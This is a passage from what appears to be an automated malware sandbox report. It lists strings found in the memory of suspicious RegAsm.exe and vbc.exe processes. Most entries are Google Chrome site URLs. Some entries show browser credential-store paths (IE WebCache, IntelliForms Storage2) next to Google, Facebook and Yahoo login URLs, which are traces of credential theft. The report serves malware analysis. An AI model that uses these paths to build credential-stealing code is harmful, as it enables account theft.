            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
            Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
            Source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: RegAsm.exe, 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: vbc.exe, 00000002.00000003.259269966.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258819074.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.259692750.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260195881.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.281319669.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282249348.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297987936.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298543150.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297638157.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297665555.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.300106270.0000000002288000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.301530579.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000002.00000003.259269966.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258819074.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.259692750.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260195881.0000000002418000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.281319669.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282249348.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297987936.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298543150.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297638157.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297665555.0000000000A08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.300106270.0000000002288000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.301530579.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000002.00000003.259179017.0000000002418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gd